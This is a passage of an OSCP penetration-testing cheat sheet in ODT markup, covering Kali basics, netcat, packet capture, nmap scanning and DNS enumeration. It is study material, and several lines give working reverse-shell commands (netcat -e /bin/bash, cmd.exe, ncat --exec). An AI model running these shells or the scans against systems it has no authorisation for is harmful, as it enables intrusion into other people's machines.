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guridad:enlaces:certificaciones:oscp:oscp-survival-guide"/><text:bookmark-start text:name="__RefHeading___oscp-survival-guide_1"/><text:bookmark-start text:name="oscp-survival-guide"/>OSCP-Survival-Guide<text:bookmark-end text:name="__RefHeading___oscp-survival-guide_1"/><text:bookmark-end text:name="oscp-survival-guide"/></text:h>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://pastebin.com/kdc6th08" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://pastebin.com/kdc6th08</text:a></text:p>
      <text:p text:style-name="Preformatted_20_Text"><text:s text:c="3"/>_____ _____ _____ ______<text:s text:c="3"/>_____<text:s text:c="18"/>_<text:s text:c="12"/>_<text:s text:c="3"/>_____<text:s text:c="7"/>_<text:s text:c="5"/>_<text:s text:c="6"/><text:line-break/><text:s text:c="2"/>|<text:s text:c="2"/>_<text:s text:c="2"/>/<text:s text:c="2"/>___/<text:s text:c="2"/>__ \| ___ \ /<text:s text:c="2"/>___|<text:s text:c="16"/>(_)<text:s text:c="10"/>| | |<text:s text:c="2"/>__ \<text:s text:c="5"/>(_)<text:s text:c="3"/>| |<text:s text:c="5"/><text:line-break/><text:s text:c="2"/>| | | \ `--.| /<text:s text:c="2"/>\/| |_/ / \ `--. _<text:s text:c="3"/>_ _ ____<text:s text:c="3"/>_____<text:s text:c="3"/>____ _| | | |<text:s text:c="2"/>\/_<text:s text:c="3"/>_ _<text:s text:c="2"/>__| | ___ <text:line-break/><text:s text:c="2"/>| | | |`--. \ |<text:s text:c="4"/>|<text:s text:c="2"/>__/<text:s text:c="3"/>`--. \ | | | '__\ \ / / \ \ / / _` | | | | __| | | | |/ _` |/ _ \<text:line-break/><text:s text:c="2"/>\ \_/ /\__/ / \__/\| |<text:s text:c="5"/>/\__/ / |_| | |<text:s text:c="3"/>\ V /| |\ V / (_| | | | |_\ \ |_| | | (_| |<text:s text:c="2"/>__/<text:line-break/><text:s text:c="3"/>\___/\____/ \____/\_|<text:s text:c="5"/>\____/ \__,_|_|<text:s text:c="4"/>\_/ |_| \_/ \__,_|_|<text:s text:c="2"/>\____/\__,_|_|\__,_|\___|<text:line-break/><text:line-break/>Kali Linux Offensive Security Certified Professional Playbook<text:line-break/><text:line-break/> **NOTE: This document reffers to the target ip as the export variable $ip.**<text:s text:c="2"/><text:line-break/> <text:line-break/> **To set this value on the command line use the following syntax:**<text:line-break/> <text:line-break/> **export ip=192.168.1.100**<text:line-break/> <text:line-break/> <text:line-break/>***UPDATE: October 2, 2017***<text:line-break/>Thanks for all the Stars! Wrote my OSCP exam last night, did not pass sadly ... but I recorded a stop motion video of my failed attempt. TRY HARDER!<text:line-break/><text:line-break/>https://www.youtube.com/watch?v=HBMZWl9zcsc<text:line-break/><text:line-break/>The good news is that I will be learning more and adding more content to this guide :D<text:line-break/><text:line-break/><text:line-break/>## Table of Contents<text:line-break/>- [Kali Linux](#kali-linux)<text:line-break/>- [Information Gathering &amp; Vulnerability Scanning](#information-gathering--vulnerability-scanning)<text:line-break/><text:s text:c="2"/>* [Passive Information Gathering](#passive-information-gathering)<text:line-break/><text:s text:c="2"/>* [Active Information Gathering](#active-information-gathering)<text:line-break/><text:s text:c="2"/>* [Port Scanning](#port-scanning)<text:line-break/><text:s text:c="2"/>* [Enumeration](#enumeration)<text:line-break/><text:s text:c="2"/>* [HTTP Enumeration](#http-enumeration)<text:line-break/>- [Buffer Overflows and Exploits](#buffer-overflows-and-exploits)<text:line-break/>- [Shells](#shells)<text:line-break/>- [File Transfers](#file-transfers)<text:line-break/>- [Privilege Escalation](#privilege-escalation)<text:line-break/><text:s text:c="2"/>* [Linux Privilege Escalation](#linux-privilege-escalation)<text:line-break/><text:s text:c="2"/>* [Windows Privilege Escalation](#windows-privilege-escalation)<text:line-break/>- [Client, Web and Password Attacks](#client-web-and-password-attacks)<text:line-break/><text:s text:c="2"/>* [Client Attacks](#client-attacks)<text:line-break/><text:s text:c="2"/>* [Web Attacks](#web-attacks)<text:line-break/><text:s text:c="2"/>* [File Inclusion Vulnerabilities LFI/RFI](#file-inclusion-vulnerabilities)<text:line-break/><text:s text:c="2"/>* [Database Vulnerabilities](#database-vulnerabilities)<text:line-break/><text:s text:c="2"/>* [Password Attacks](#password-attacks)<text:line-break/><text:s text:c="2"/>* [Password Hash Attacks](#password-hash-attacks)<text:line-break/>- [Networking, Pivoting and Tunneling](#networking-pivoting-and-tunneling)<text:line-break/>- [The Metasploit Framework](#the-metasploit-framework)<text:line-break/>- [Bypassing Antivirus Software](#bypassing-antivirus-software)<text:line-break/><text:line-break/>Kali Linux<text:line-break/>========================================================================================================<text:line-break/><text:line-break/>-<text:s text:c="3"/>Set the Target IP Address to the `$ip` system variable<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>`export ip=192.168.1.100`<text:line-break/><text:line-break/>-<text:s text:c="3"/>Find the location of a file<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>`locate sbd.exe`<text:line-break/><text:line-break/>-<text:s text:c="3"/>Search through directories in the `$PATH` environment variable<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>`which sbd`<text:line-break/><text:line-break/>-<text:s text:c="3"/>Find a search for a file that contains a specific string in it’s<text:line-break/><text:s text:c="4"/>name:<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>`find / -name sbd\*`<text:line-break/><text:line-break/>-<text:s text:c="3"/>Show active internet connections<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>`netstat -lntp`<text:line-break/><text:line-break/>-<text:s text:c="3"/>Change Password<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>`passwd`<text:line-break/><text:line-break/>-<text:s text:c="3"/>Verify a service is running and listening<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>`netstat -antp |grep apache`<text:line-break/><text:line-break/>-<text:s text:c="3"/>Start a service<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>`systemctl start ssh<text:s text:c="2"/>`<text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="4"/>`systemctl start apache2`<text:line-break/><text:line-break/>-<text:s text:c="3"/>Have a service start at boot<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>`systemctl enable ssh`<text:line-break/><text:line-break/>-<text:s text:c="3"/>Stop a service<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>`systemctl stop ssh`<text:line-break/><text:line-break/>-<text:s text:c="3"/>Unzip a gz file<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>`gunzip access.log.gz`<text:line-break/><text:line-break/>-<text:s text:c="3"/>Unzip a tar.gz file<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>`tar -xzvf file.tar.gz`<text:line-break/><text:line-break/>-<text:s text:c="3"/>Search command history<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>`history | grep phrase_to_search_for`<text:line-break/><text:line-break/>-<text:s text:c="3"/>Download a webpage<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>`wget http://www.cisco.com`<text:line-break/><text:line-break/>-<text:s text:c="3"/>Open a webpage<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>`curl http://www.cisco.com`<text:line-break/><text:line-break/>-<text:s text:c="3"/>String manipulation<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Count number of lines in file<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`wc index.html`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Get the start or end of a file<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`head index.html`<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>`tail index.html`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Extract all the lines that contain a string<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`grep "href=" index.html`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Cut a string by a delimiter, filter results then sort<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`grep "href=" index.html | cut -d "/" -f 3 | grep "\\." | cut -d '"' -f 1 | sort -u`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Using Grep and regular expressions and output to a file<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`cat index.html | grep -o 'http://\[^"\]\*' | cut -d "/" -f 3 | sort –u &gt; list.txt`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Use a bash loop to find the IP address behind each host<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`for url in $(cat list.txt); do host $url; done`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Collect all the IP Addresses from a log file and sort by<text:line-break/><text:s text:c="8"/>frequency<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`cat access.log | cut -d " " -f 1 | sort | uniq -c | sort -urn`<text:line-break/><text:line-break/>-<text:s text:c="3"/>Decoding using Kali<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Decode Base64 Encoded Values<text:line-break/><text:s text:c="7"/><text:line-break/><text:s text:c="8"/>`echo -n "QWxhZGRpbjpvcGVuIHNlc2FtZQ==" | base64 --decode`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Decode Hexidecimal Encoded Values<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`echo -n "46 4c 34 36 5f 33 3a 32 396472796 63637756 8656874" | xxd -r -ps`<text:line-break/><text:line-break/>-<text:s text:c="3"/>Netcat - Read and write TCP and UDP Packets<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Download Netcat for Windows (handy for creating reverse shells and transfering files on windows systems):<text:line-break/><text:s text:c="8"/>[https://joncraton.org/blog/46/netcat-for-windows/](https://joncraton.org/blog/46/netcat-for-windows/)<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Connect to a POP3 mail server<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`nc -nv $ip 110`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Listen on TCP/UDP port<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`nc -nlvp 4444`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Connect to a netcat port<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`nc -nv $ip 4444`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Send a file using netcat<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`nc -nv $ip 4444 &lt; /usr/share/windows-binaries/wget.exe`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Receive a file using netcat<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`nc -nlvp 4444 &gt; incoming.exe`<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Some OSs (OpenBSD) will use nc.traditional rather than nc so watch out for that...<text:line-break/><text:s text:c="9"/><text:line-break/><text:s text:c="12"/>whereis nc<text:line-break/><text:s text:c="12"/>nc: /bin/nc.traditional /usr/share/man/man1/nc.1.gz<text:line-break/><text:line-break/><text:s text:c="12"/>/bin/nc.traditional -e /bin/bash 1.2.3.4 4444<text:line-break/><text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Create a reverse shell with Ncat using cmd.exe on Windows<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`nc.exe -nlvp 4444 -e cmd.exe`<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>or<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>`nc.exe -nv &lt;Remote IP&gt; &lt;Remote Port&gt; -e cmd.exe`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Create a reverse shell with Ncat using bash on Linux<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`nc -nv $ip 4444 -e /bin/bash`<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Netcat for Banner Grabbing:<text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="8"/>`echo "" | nc -nv -w1 &lt;IP Address&gt; &lt;Ports&gt;`<text:line-break/><text:line-break/>-<text:s text:c="3"/>Ncat - Netcat for Nmap project which provides more security avoid<text:line-break/><text:s text:c="4"/>IDS<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Reverse shell from windows using cmd.exe using ssl<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`ncat --exec cmd.exe --allow $ip -vnl 4444 --ssl`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Listen on port 4444 using ssl<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`ncat -v $ip 4444 --ssl`<text:line-break/><text:line-break/>-<text:s text:c="3"/>Wireshark<text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Show only SMTP (port 25) and ICMP traffic:<text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="8"/>`tcp.port eq 25 or icmp`<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Show only traffic in the LAN (192.168.x.x), between workstations and servers -- no Internet:<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>`ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16`<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Filter by a protocol ( e.g. SIP ) and filter out unwanted IPs:<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>`ip.src != xxx.xxx.xxx.xxx &amp;&amp; ip.dst != xxx.xxx.xxx.xxx &amp;&amp; sip`<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Some commands are equal<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>`ip.addr == xxx.xxx.xxx.xxx`<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="9"/>Equals<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>`ip.src == xxx.xxx.xxx.xxx or ip.dst == xxx.xxx.xxx.xxx `<text:line-break/><text:line-break/><text:s text:c="8"/>` ip.addr != xxx.xxx.xxx.xxx`<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="9"/>Equals<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>`ip.src != xxx.xxx.xxx.xxx or ip.dst != xxx.xxx.xxx.xxx`<text:line-break/><text:line-break/>-<text:s text:c="3"/>Tcpdump<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Display a pcap file<text:s text:c="2"/><text:line-break/><text:s text:c="7"/>`tcpdump -r passwordz.pcap`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Display ips and filter and sort<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`tcpdump -n -r passwordz.pcap | awk -F" " '{print $3}' | sort -u | head`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Grab a packet capture on port 80<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`tcpdump tcp port 80 -w output.pcap -i eth0`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Check for ACK or PSH flag set in a TCP packet<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`tcpdump -A -n 'tcp[13] = 24' -r passwordz.pcap`<text:line-break/><text:line-break/>-<text:s text:c="3"/>IPTables <text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Deny traffic to ports except for Local Loopback<text:line-break/><text:line-break/><text:s text:c="8"/>`iptables -A INPUT -p tcp --destination-port 13327 ! -d $ip -j DROP<text:s text:c="2"/>`<text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="8"/>`iptables -A INPUT -p tcp --destination-port 9991 ! -d $ip -j DROP`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Clear ALL IPTables firewall rules<text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="12"/>iptables -P INPUT ACCEPT<text:line-break/><text:s text:c="12"/>iptables -P FORWARD ACCEPT<text:line-break/><text:s text:c="12"/>iptables -P OUTPUT ACCEPT<text:line-break/><text:s text:c="12"/>iptables -t nat -F<text:line-break/><text:s text:c="12"/>iptables -t mangle -F<text:line-break/><text:s text:c="12"/>iptables -F<text:line-break/><text:s text:c="12"/>iptables -X<text:line-break/><text:s text:c="12"/>iptables -t raw -F iptables -t raw -X<text:line-break/><text:line-break/>Information Gathering &amp; Vulnerability Scanning<text:line-break/>===================================================================================================================================<text:line-break/><text:line-break/>-<text:s text:c="3"/>Passive Information Gathering<text:line-break/><text:s text:c="4"/>---------------------------------------------------------------------------------------------------------------------------<text:line-break/><text:line-break/>-<text:s text:c="3"/>Google Hacking<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Google search to find website sub domains<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`site:microsoft.com`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Google filetype, and intitle<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`intitle:"netbotz appliance" "OK" -filetype:pdf`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Google inurl<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`inurl:"level/15/sexec/-/show"`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Google Hacking Database:<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>https://www.exploit-db.com/google-hacking-database/<text:line-break/><text:line-break/>-<text:s text:c="3"/>SSL Certificate Testing<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>[https://www.ssllabs.com/ssltest/analyze.html](https://www.ssllabs.com/ssltest/analyze.html)<text:line-break/><text:line-break/>-<text:s text:c="3"/>Email Harvesting<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Simply Email<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`git clone https://github.com/killswitch-GUI/SimplyEmail.git<text:s text:c="2"/>`<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>`./SimplyEmail.py -all -e TARGET-DOMAIN`<text:line-break/><text:line-break/>-<text:s text:c="3"/>Netcraft<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Determine the operating system and tools used to build a site<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>https://searchdns.netcraft.com/<text:line-break/><text:line-break/>-<text:s text:c="3"/>Whois Enumeration<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>`whois domain-name-here.com<text:s text:c="2"/>`<text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="4"/>`whois $ip`<text:line-break/><text:line-break/>-<text:s text:c="3"/>Banner Grabbing<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>`nc -v $ip 25`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>`telnet $ip 25`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>`nc TARGET-IP 80`<text:line-break/><text:line-break/>-<text:s text:c="3"/>Recon-ng - full-featured web reconnaissance framework written in Python<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>`cd /opt; git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git<text:s text:c="2"/>`<text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="8"/>`cd /opt/recon-ng<text:s text:c="2"/>`<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>`./recon-ng<text:s text:c="2"/>`<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>`show modules<text:s text:c="2"/>`<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>`help`<text:line-break/><text:line-break/>-<text:s text:c="3"/>Active Information Gathering<text:line-break/><text:s text:c="4"/>--------------------------------------------------------------------------------------------------------------------------<text:line-break/><text:line-break/>&lt;!-- --&gt;<text:line-break/><text:line-break/><text:line-break/>-<text:s text:c="3"/>Port Scanning<text:line-break/><text:s text:c="4"/>-----------------------------------------------------------------------------------------------------------<text:line-break/>*Subnet Reference Table*<text:line-break/><text:line-break/>/ | Addresses | Hosts | Netmask | Amount of a Class C<text:line-break/>--- | --- | --- | --- | --- <text:line-break/>/30 | 4 | 2 | 255.255.255.252| 1/64<text:line-break/>/29 | 8 | 6 | 255.255.255.248 | 1/32<text:line-break/>/28 | 16 | 14 | 255.255.255.240 | 1/16<text:line-break/>/27 | 32 | 30 | 255.255.255.224 | 1/8<text:line-break/>/26 | 64 | 62 | 255.255.255.192 | 1/4<text:line-break/>/25 | 128 | 126 | 255.255.255.128 | 1/2<text:line-break/>/24 | 256 | 254 | 255.255.255.0 | 1<text:line-break/>/23 | 512 | 510 | 255.255.254.0 | 2<text:line-break/>/22 | 1024 | 1022 | 255.255.252.0 | 4<text:line-break/>/21 | 2048 | 2046 | 255.255.248.0 | 8<text:line-break/>/20 | 4096 | 4094 | 255.255.240.0 | 16<text:line-break/>/19 | 8192 | 8190 | 255.255.224.0 | 32<text:line-break/>/18 | 16384 | 16382 | 255.255.192.0 | 64<text:line-break/>/17 | 32768 | 32766 | 255.255.128.0 | 128<text:line-break/>/16 | 65536 | 65534 | 255.255.0.0 | 256<text:line-break/><text:line-break/> -<text:s text:c="3"/>Set the ip address as a varble<text:s text:c="2"/><text:line-break/><text:s text:c="5"/>`export ip=192.168.1.100<text:s text:c="2"/>`<text:line-break/><text:s text:c="5"/>`nmap -A -T4 -p- $ip`<text:line-break/><text:line-break/> -<text:s text:c="3"/>Netcat port Scanning<text:s text:c="2"/><text:line-break/><text:s text:c="5"/>`nc -nvv -w 1 -z $ip 3388-3390`<text:line-break/><text:s text:c="5"/><text:line-break/> -<text:s text:c="3"/>Discover active IPs usign ARP on the network:<text:line-break/><text:s text:c="5"/>`arp-scan $ip/24`<text:line-break/><text:line-break/> -<text:s text:c="3"/>Discover who else is on the network<text:s text:c="2"/><text:line-break/><text:s text:c="5"/>`netdiscover`<text:line-break/><text:line-break/> -<text:s text:c="3"/>Discover IP Mac and Mac vendors from ARP<text:s text:c="2"/><text:line-break/><text:s text:c="5"/>`netdiscover -r $ip/24`<text:line-break/><text:line-break/> -<text:s text:c="3"/>Nmap stealth scan using SYN<text:s text:c="2"/><text:line-break/><text:s text:c="5"/>`nmap -sS $ip`<text:line-break/><text:line-break/> -<text:s text:c="3"/>Nmap stealth scan using FIN<text:s text:c="2"/><text:line-break/><text:s text:c="5"/>`nmap -sF $ip`<text:line-break/><text:line-break/> -<text:s text:c="3"/>Nmap Banner Grabbing<text:s text:c="2"/><text:line-break/><text:s text:c="5"/>`nmap -sV -sT $ip`<text:line-break/><text:line-break/> -<text:s text:c="3"/>Nmap OS Fingerprinting<text:s text:c="2"/><text:line-break/><text:s text:c="5"/>`nmap -O $ip`<text:line-break/><text:line-break/> -<text:s text:c="3"/>Nmap Regular Scan:<text:s text:c="2"/><text:line-break/><text:s text:c="5"/>`nmap $ip/24`<text:line-break/><text:line-break/> -<text:s text:c="3"/>Enumeration Scan<text:s text:c="2"/><text:line-break/><text:s text:c="5"/>`nmap -p 1-65535 -sV -sS -A -T4 $ip/24 -oN nmap.txt`<text:line-break/><text:line-break/> -<text:s text:c="3"/>Enumeration Scan All Ports TCP / UDP and output to a txt file<text:s text:c="2"/><text:line-break/><text:s text:c="5"/>`nmap -oN nmap2.txt -v -sU -sS -p- -A -T4 $ip`<text:line-break/><text:line-break/> -<text:s text:c="3"/>Nmap output to a file:<text:s text:c="2"/><text:line-break/><text:s text:c="5"/>`nmap -oN nmap.txt -p 1-65535 -sV -sS -A -T4 $ip/24`<text:line-break/><text:line-break/> -<text:s text:c="3"/>Quick Scan:<text:s text:c="2"/><text:line-break/><text:s text:c="5"/>`nmap -T4 -F $ip/24`<text:line-break/><text:line-break/> -<text:s text:c="3"/>Quick Scan Plus:<text:s text:c="2"/><text:line-break/><text:s text:c="5"/>`nmap -sV -T4 -O -F --version-light $ip/24`<text:line-break/><text:line-break/> -<text:s text:c="3"/>Quick traceroute<text:s text:c="2"/><text:line-break/><text:s text:c="5"/>`nmap -sn --traceroute $ip`<text:line-break/><text:line-break/> -<text:s text:c="3"/>All TCP and UDP Ports<text:s text:c="2"/><text:line-break/><text:s text:c="5"/>`nmap -v -sU -sS -p- -A -T4 $ip`<text:line-break/><text:line-break/> -<text:s text:c="3"/>Intense Scan:<text:s text:c="2"/><text:line-break/><text:s text:c="5"/>`nmap -T4 -A -v $ip`<text:line-break/><text:line-break/> -<text:s text:c="3"/>Intense Scan Plus UDP<text:s text:c="2"/><text:line-break/><text:s text:c="5"/>`nmap -sS -sU -T4 -A -v $ip/24`<text:line-break/><text:line-break/> -<text:s text:c="3"/>Intense Scan ALL TCP Ports<text:s text:c="2"/><text:line-break/><text:s text:c="5"/>`nmap -p 1-65535 -T4 -A -v $ip/24`<text:line-break/><text:line-break/> -<text:s text:c="3"/>Intense Scan - No Ping<text:s text:c="2"/><text:line-break/><text:s text:c="5"/>`nmap -T4 -A -v -Pn $ip/24`<text:line-break/><text:line-break/> -<text:s text:c="3"/>Ping scan<text:s text:c="2"/><text:line-break/><text:s text:c="5"/>`nmap -sn $ip/24`<text:line-break/><text:line-break/> -<text:s text:c="3"/>Slow Comprehensive Scan<text:s text:c="2"/><text:line-break/><text:s text:c="5"/>`nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script "default or (discovery and safe)" $ip/24`<text:line-break/><text:line-break/> -<text:s text:c="3"/>Scan with Active connect in order to weed out any spoofed ports designed to troll you<text:s text:c="2"/><text:line-break/><text:s text:c="5"/>`nmap -p1-65535 -A -T5 -sT $ip`<text:line-break/><text:line-break/>-<text:s text:c="3"/>Enumeration<text:line-break/><text:s text:c="4"/>-----------<text:line-break/><text:line-break/>-<text:s text:c="3"/>DNS Enumeration<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>NMAP DNS Hostnames Lookup<text:line-break/><text:s text:c="8"/>`nmap -F --dns-server &lt;dns server ip&gt; &lt;target ip range&gt;`<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Host Lookup<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`host -t ns megacorpone.com`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Reverse Lookup Brute Force - find domains in the same range<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`for ip in $(seq 155 190);do host 50.7.67.$ip;done |grep -v "not found"`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Perform DNS IP Lookup<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`dig a domain-name-here.com @nameserver`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Perform MX Record Lookup<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`dig mx domain-name-here.com @nameserver`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Perform Zone Transfer with DIG<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`dig axfr domain-name-here.com @nameserver`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>DNS Zone Transfers<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>Windows DNS zone transfer<text:s text:c="2"/><text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>`nslookup -&gt; set type=any -&gt; ls -d blah.com<text:s text:c="2"/>`<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>Linux DNS zone transfer<text:s text:c="2"/><text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>`dig axfr blah.com @ns1.blah.com`<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Dnsrecon DNS Brute Force<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Dnsrecon DNS List of megacorp<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`dnsrecon -d megacorpone.com -t axfr`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>DNSEnum<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`dnsenum zonetransfer.me`<text:line-break/><text:line-break/>-<text:s text:c="3"/>NMap Enumeration Script List:<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>NMap Discovery<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>[*https://nmap.org/nsedoc/categories/discovery.html*](https://nmap.org/nsedoc/categories/discovery.html)<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Nmap port version detection MAXIMUM power<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`nmap -vvv -A --reason --script="+(safe or default) and not broadcast" -p &lt;port&gt; &lt;host&gt;`<text:line-break/><text:line-break/><text:line-break/>-<text:s text:c="3"/>NFS (Network File System) Enumeration<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Show Mountable NFS Shares <text:line-break/><text:s text:c="8"/>`nmap -sV --script=nfs-showmount $ip`<text:line-break/><text:line-break/>-<text:s text:c="3"/>RPC (Remote Procedure Call) Enumeration<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Connect to an RPC share without a username and password and enumerate 